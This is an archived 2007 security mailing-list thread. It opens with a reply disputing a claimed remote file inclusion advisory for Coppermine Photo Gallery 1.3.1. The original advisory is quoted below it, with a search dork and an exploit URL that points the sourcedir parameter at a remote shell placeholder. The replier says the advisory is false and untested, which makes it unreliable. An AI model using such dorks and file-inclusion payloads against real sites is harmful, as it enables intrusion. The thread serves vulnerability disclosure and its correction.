subject:"Coppermine Photo Gallery \(yabbse.inc.php\) Remote File Inclusion Vulnerability"

Re: Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

2007-08-10 Thread laurent . gaffie

false advisory again here...


you should read the code, unless to do a basic search with your editor for :

-include($
-include_once($
-require($
-require_once($

dont you think you should try your "PoC" before you do send it on a 
professional bugtraq like securityfocus ?
plz guys stop diffusing this kind of false advisory.


regards laurent gaffié

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

2007-08-08 Thread master-of-desastor

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability

DoRk:"Powered by Coppermine Photo Gallery"
Vuln. code: 
require_once("$sourcedir/Load.php");require_once("$sourcedir/Security.php");
Exploit:
www.server.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]
Author:Ma$tEr-0F-De$a$t0r